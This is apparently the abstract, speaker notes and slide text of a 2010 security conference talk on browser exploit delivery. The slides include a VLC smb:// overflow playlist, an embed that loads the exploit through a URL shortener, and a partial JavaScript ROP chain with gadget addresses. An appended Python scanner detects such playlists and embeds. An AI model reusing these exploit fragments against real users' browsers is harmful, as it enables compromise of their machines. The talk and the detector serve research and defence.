W.E.B. 2010 - Web, Exploits, Browsers

My talk at Hack in the Box 2010 - Kuala Lumpur

It has been a decade since I started talking about computer security. Those ten years have witnessed a change in threat landscapes, attack targets, exploits, techniques and damage. Two ecosystems are slowly and surely converging into one. On one hand, we have the application layer. Much has been said about it. There is a steady trickle of XSS, XSRF, SQL injection and the usual suspects. Some of them come under the guise of "Web 2.0", and some of them are as ancient as the CGI attacks of 1999. On the other hand, we have the desktop. Dominating the desktop is the browser, with its horde of assistants. Exploitation in this space has accelerated in the last three years.

How will the threat landscape change with the advent of new technologies and services? New standards are emerging, and the darling child of the web is HTML 5. A closer look at the standards reveals an awful mess. Are the standards mitigating any security concerns? More importantly, will browser vendors and web application developers really respect the standards? The browser wars taught us that "might is right": if everyone breaks the web, that becomes the newly adopted standard. New technologies, coupled with popular online services, make for some very interesting exploit delivery techniques.

This talk explores some innovative exploit delivery techniques that are born out of bloated standards and services designed without much thought for security. We cover techniques where exploits can be delivered through URL shorteners and images. We take a look at some browser exploits. The talk ends with a discussion of exploit sophistication, ranging from highly polished and elegant techniques such as Return Oriented Programming to the downright crude and ugly, such as DLL Hijacking. How do all these pieces fit together? And will Anti-Virus still save us all?

Speaker notes:
  • Talk about the BROWSER WARS. The race is on for the fastest JS interpreter: IE vs FF, Chrome vs Safari, Chrome offering an IE plugin (Frankenchrome), IE calling the Chrome plugin insecure, Steve Jobs trashing Flash, Chrome making Flash an integral part of the browser, and the list goes on...
  • Slew of recent Java vulnerabilities, the latest being the command exec vuln in Java Web Start. QuickTime, VLC and other plugins keep getting exploited regularly. So do toolbars.
  • Flash Sprays
  • URL Shorteners, can host an entire exploit.
  • 800+ Javascript events, Video, and more
  • Sandboxing isn't the solution.

Slides:

    1. W.E.B. 2010 - Web . Exploits . Browsers
       Saumil Shah
       Hack in the Box - Kuala Lumpur 2010
    2. # who am i
       Saumil Shah, CEO Net-square
       LinkedIn: saumilshah
    4. LOOK AT ALL THE COOL STUFF!!
       5
    5. 5
       33% MORE!
    6. 5
       With JIT! Fights DEP, ASLR!
    7. 5
       Worldwide coverage, hides your tracks.
    8. 5
       ...as never seen before!
    9. 5
       GUARANTEED!! Fresh new bugs, present on most computers
    13. I can haz sandbox
        I Also Can!
    14. IM IN UR BASE
        KILLING UR D00DZ
        Sploit Time!
    15. See no EVAL
        CVE 2010-2883
        (0+1)day exploit
        Obfuscated Javascript decoded without using eval, document.write, etc.
    17. Who you gonna call?
    18. howstuffworks - Anti Virus
        YER NOT ON THE LIST! COME ON IN.
    19. howstuffworks - Anti Virus
        These are not the sploitz you're looking for.
    20. 0-day to the Face!
        "To get our new signature files you need a valid support plan."
    21. ...and keep on patching
    23. W3C
        "I don't think it's ready for production yet," especially since W3C still will make some changes on APIs, said Le Hegaret. "The real problem is can we make HTML5 work across browsers and at the moment, that is not the case." [6th October 2010]
    25. Application Delivery - The Web at present
        Authentication, Statefulness, Data Typing, Non-mutable
        HTTP, HTML, AJAX, Flash, Sandbox, HTML5, Anti-XSS, WAF, Silverlight, Web sockets
        MIND THE GAP
    26. Sploit Time!
    27. Making the impossible possible
        smb:// mrl buffer overflow
    28. VLC smb:// overflow - playlist
        <?xml version="1.0" encoding="UTF-8"?>
        <playlist version="1"
          xmlns="http://xspf.org/ns/0/"
          xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/">
          <title>Playlist</title>
          <trackList>
            <track>
              <location>smb://example.com@{AAAAAAAA....}</location>
              <extension application="http://www.videolan.org/vlc/playlist/0">
                <vlc:id>0</vlc:id>
              </extension>
            </track>
          </trackList>
        </playlist>
    29. ...just add bit.ly
        smb:// mrl buffer overflow
    31. 100% Pure Alphanum!
    32. VLC smb overflow - HTMLized!!
        <embed type="application/x-vlc-plugin"
          width="320" height="200"
          target="http://tinyurl.com/ycctrzf"
          id="vlc" />
        I'm in ur browser....
        ...blowin up ur g00dz
        pwn
    34. I'm an evil Javascript
        I'm an innocent image
    35. function packv(n){var s=new Number(n).toString(16);while(s.length<8)s="0"+s;return(unescape("%u"+s.substring(4,8)+"%u"+s.substring(0,4)))}
        var addressof=new Array();
        addressof["ropnop"]=0x6d81bdf0;
        addressof["xchg_eax_esp_ret"]=0x6d81bdef;
        addressof["pop_eax_ret"]=0x6d906744;
        addressof["pop_ecx_ret"]=0x6d81cd57;
        addressof["mov_peax_ecx_ret"]=0x6d979720;
        addressof["mov_eax_pecx_ret"]=0x6d8d7be0;
        addressof["mov_pecx_eax_ret"]=0x6d8eee01;
        addressof["inc_eax_ret"]=0x6d838f54;
        addressof["add_eax_4_ret"]=0x00000000;
        addressof["call_peax_ret"]=0x6d8aec31;
        addressof["add_esp_24_ret"]=0x00000000;
        addressof["popad_ret"]=0x6d82a8a1;
        addressof["call_peax"]=0x6d802597;
        function call_ntallocatevirtualmemory(baseptr,size,callnum){
          var ropnop=packv(addressof["ropnop"]);
          var pop_eax_ret=packv(addressof["pop_eax_ret"]);
          var pop_ecx_ret=packv(addressof["pop_ecx_ret"]);
          var mov_peax_ecx_ret=packv(addressof["mov_peax_ecx_ret"]);
          var mov_eax_pecx_ret=packv(addressof["mov_eax_pecx_ret"]);
          var mov_pecx_eax_ret=packv(addressof["mov_pecx_eax_ret"]);
          var call_peax_ret=packv(addressof["call_peax_ret"]);
          var add_esp_24_ret=packv(addressof["add_esp_24_ret"]);
          var popad_ret=packv(addressof["popad_ret"]);
          var retval=""
        EET - Exploit Enabler Technology
        <canvas>
    36. The Solution?
        HTML 8.0
        HTTP 2.0
        Browser Security Model
        Self Contained Apps
    37. shoutz...
        L33tdawg, Amy, cbelinda
        KUL volunteerz
        NL crew
        Paul Vixie
    38. kthxbai
        www.net-square.com
        secure . automate . innovate
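A defensive counterpart to the two delivery artifacts on slides 28 and 32, added here as example code (it is not from the talk, from Net-square or from VLC): a scanner that flags XSPF playlists whose smb:// authority part is implausibly long or padded with one repeated byte, and VLC plugin embeds whose target is fetched through a URL shortener. The shortener list, the 255-byte ceiling and the sample playlist and embed are constructed assumptions.

```python
import re
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

XSPF_NS = "{http://xspf.org/ns/0/}"
# Shortener hosts: the two named on the slides plus a few common ones (assumed list).
SHORTENER_HOSTS = {"bit.ly", "tinyurl.com", "goo.gl", "t.co", "is.gd"}
# Assumed ceiling for the user@host part of an smb:// MRL; the overflow on slide 27
# needs a very long string here, a real share reference does not.
MAX_AUTHORITY_LEN = 255

def check_xspf(xml_text):
    """Return findings for smb:// <location> entries that look like overflow padding."""
    findings = []
    root = ET.fromstring(xml_text)
    for loc in root.iter(XSPF_NS + "location"):
        mrl = (loc.text or "").strip()
        if not mrl.lower().startswith("smb://"):
            continue
        authority = mrl[len("smb://"):].split("/", 1)[0]   # user@host[:port]
        if len(authority) > MAX_AUTHORITY_LEN:
            findings.append(f"smb authority is {len(authority)} bytes long")
        elif re.search(r"(.)\1{31,}", authority):          # 32+ identical bytes in a row
            findings.append("smb authority contains a 32+ run of one character")
    return findings

EMBED_RE = re.compile(r"<embed\b[^>]*>", re.I)
ATTR_RE = re.compile(r'([\w:-]+)\s*=\s*"([^"]*)"')

def check_html(html):
    """Return findings for VLC plugin embeds whose target hides behind a shortener."""
    findings = []
    for tag in EMBED_RE.findall(html):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(tag)}
        if attrs.get("type", "").lower() != "application/x-vlc-plugin":
            continue
        host = (urlparse(attrs.get("target", "")).hostname or "").lower()
        if host in SHORTENER_HOSTS:
            findings.append(f"VLC embed loads its target via shortener {host}")
    return findings

# Constructed samples modelled on slides 28 and 32 (placeholder shortener path,
# not the one on the slide); the padded playlist uses 600 'A's as filler.
BAD_PLAYLIST = ('<playlist version="1" xmlns="http://xspf.org/ns/0/"><trackList>'
                '<track><location>smb://example.com@' + "A" * 600 +
                '</location></track></trackList></playlist>')
GOOD_PLAYLIST = ('<playlist version="1" xmlns="http://xspf.org/ns/0/"><trackList>'
                 '<track><location>smb://fileserver/media/talk.mp4</location>'
                 '</track></trackList></playlist>')
BAD_EMBED = ('<embed type="application/x-vlc-plugin" width="320" height="200" '
             'target="http://tinyurl.com/PLACEHOLDER" id="vlc" />')
```

Both checks are heuristics for triage, not a signature: the shortener itself is harmless, so a hit on `check_html` is a cue to resolve the redirect and inspect what it actually serves.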